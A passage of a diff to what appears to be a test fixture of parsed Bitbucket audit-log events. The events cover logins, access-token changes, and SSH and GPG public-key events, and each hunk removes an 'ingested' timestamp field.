in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034756,\"nano\":414000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -2205,7 +2176,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020792513Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"177\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:38:58.087Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 177\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638034756,\"nano\":499000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2285,7 +2255,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.projectpermissiongranted", - "ingested": "2021-12-24T00:37:41.020793254Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"~ADMIN\",\"type\":\"PROJECT\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.projectpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"PROJECT_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"PROJECT_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"~ADMIN\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035568,\"nano\":728000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2357,7 +2326,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreated", - "ingested": "2021-12-24T00:37:41.020794028Z", "original": "{\"affectedObjects\":[{\"id\":\"1\",\"name\":\"~ADMIN\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"~ADMIN\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035568,\"nano\":751000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -2447,7 +2415,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokencreated.personal", - "ingested": "2021-12-24T00:37:41.020794751Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token created\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokencreated.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"dddd\\\",\\\"permissions\\\":[\\\"PROJECT_READ\\\",\\\"REPO_READ\\\"]}\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"dddd\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"PROJECT_READ, REPO_READ\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035618,\"nano\":996000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2536,7 +2503,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokenmodified.personal", - "ingested": "2021-12-24T00:37:41.020795555Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token changed\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokenmodified.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"dddd\",\"i18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"key\":\"Name\",\"to\":\"ddddcccc\"}],\"extraAttributes\":[{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"ddddcccc\\\",\\\"permissions\\\":[\\\"PROJECT_READ\\\",\\\"REPO_READ\\\"]}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035626,\"nano\":125000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2625,7 +2591,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokenmodified.personal", - "ingested": "2021-12-24T00:37:41.020796394Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token changed\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokenmodified.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"PROJECT_READ, REPO_READ\",\"i18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"key\":\"Permissions\",\"to\":\"PROJECT_ADMIN, REPO_ADMIN\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"ddddcccc\\\",\\\"permissions\\\":[\\\"PROJECT_ADMIN\\\",\\\"REPO_ADMIN\\\"]}\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035632,\"nano\":18000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2716,7 +2681,6 @@ }, "event": { "action": "bitbucket.access.tokens.audit.action.accesstokendeleted.personal", - "ingested": "2021-12-24T00:37:41.020797143Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Personal access token deleted\",\"actionI18nKey\":\"bitbucket.access.tokens.audit.action.accesstokendeleted.personal\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permissions\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.permissions\",\"value\":\"PROJECT_ADMIN, REPO_ADMIN\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"957928486530\\\",\\\"tokenOwner\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"},\\\"name\\\":\\\"ddddcccc\\\",\\\"permissions\\\":[\\\"PROJECT_ADMIN\\\",\\\"REPO_ADMIN\\\"]}\"},{\"name\":\"Name\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.name\",\"value\":\"ddddcccc\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.access.tokens.audit.attribute.accesstoken.id\",\"value\":\"957928486530\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"GLOBAL\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035636,\"nano\":893000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -2784,7 +2748,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020797878Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035642,\"nano\":547000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -2863,7 +2826,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020798608Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"186\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:54:02.547Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 186\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035642,\"nano\":652000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2914,7 +2876,6 @@ }, "event": { "action": "bitbucket.web.audit.action.logoutsuccess", - "ingested": "2021-12-24T00:37:41.020799402Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged out\",\"actionI18nKey\":\"bitbucket.web.audit.action.logoutsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035673,\"nano\":144000000},\"version\":\"1.0\"}", "type": [ "end" @@ -2986,7 +2947,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020800191Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationfailure\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Error\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authenticationfailure.error\",\"value\":\"Authentication failed because the user does not exist, the account is inactive, or the provided credentials are incorrect\"},{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"form\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"asdfasdf\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035678,\"nano\":580000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationfailure", @@ -3055,7 +3015,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020800932Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"form\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035683,\"nano\":620000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -3124,7 +3083,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020801660Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035691,\"nano\":210000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", @@ -3203,7 +3161,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020802384Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 191\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:54:51.210Z\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"191\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035691,\"nano\":275000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3267,7 +3224,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020803186Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User password changed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.usercredentialupdated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035857,\"nano\":606000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.usercredentialupdated", @@ -3364,7 +3320,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeycreated", - "ingested": "2021-12-24T00:37:41.020803916Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added SSH access key to profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeycreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"1\"},{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":1,\\\"public-key\\\":\\\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035891,\"nano\":80000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3465,7 +3420,6 @@ }, "event": { "action": "bitbucket.plugins.gpg.audit.action.gpgevent.created", - "ingested": "2021-12-24T00:37:41.020804652Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"GPG key created\",\"actionI18nKey\":\"bitbucket.plugins.gpg.audit.action.gpgevent.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Subkeys\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.subkeys\",\"value\":\"{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}\"},{\"name\":\"Key text\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.text\",\"value\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: GnuPG v1\\r\\nComment: See Alan's GPG guide at https://futureboy.us/pgp.html\\r\\n\\r\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\r\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\"},{\"name\":\"Email\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.email\",\"value\":\"eliasen@mindspring.com\"},{\"name\":\"Fingerprint\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.fingerprint\",\"value\":\"ec2392f2ede74488680da3cf5f2b4756ed873d23\"},{\"name\":\"ID\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.id\",\"value\":\"5f2b4756ed873d23\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":\\\"5f2b4756ed873d23\\\",\\\"fingerprint\\\":\\\"ec2392f2ede74488680da3cf5f2b4756ed873d23\\\",\\\"key-text\\\":\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\\\r\\\\nVersion: GnuPG v1\\\\r\\\\nComment: See Alan's GPG guide at https://futureboy.us/pgp.html\\\\r\\\\n\\\\r\\\\nmQINBFPOzTUBEADT1kIEMY1Ix+9DyNfGHE9HPjLSI/Ybnsn/bbx8cWmeAktoYjBS\\\\r\\\\nq29mJ0tchjyG8KP38vlkvfNYKn80985a/p7ZKupxOm1dDyAn5TZguDG2fEgCYxcB...\\\",\\\"sub-keys\\\":[{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}],\\\"user\\\":{\\\"id\\\":2,\\\"name\\\":\\\"admin\\\",\\\"slug\\\":\\\"admin\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035948,\"nano\":272000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -3566,7 +3520,6 @@ }, "event": { "action": "bitbucket.plugins.gpg.audit.action.gpgevent.deleted", - "ingested": "2021-12-24T00:37:41.020805384Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"GPG key deleted\",\"actionI18nKey\":\"bitbucket.plugins.gpg.audit.action.gpgevent.deleted\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Subkeys\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.subkeys\",\"value\":\"{\\\"id\\\":\\\"11c2e18c5314e70b\\\",\\\"fingerprint\\\":\\\"dbcf265ce5178b92adeaaa7111c2e18c5314e70b\\\"}\"},{\"name\":\"Key text\",\"nameI18nKey\":\"bitbucket.plugins.gpg.audit.attribute.gpgevent.text\",\"value\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: GnuPG v1\\r\\nComment: See Alan's GPG guide at 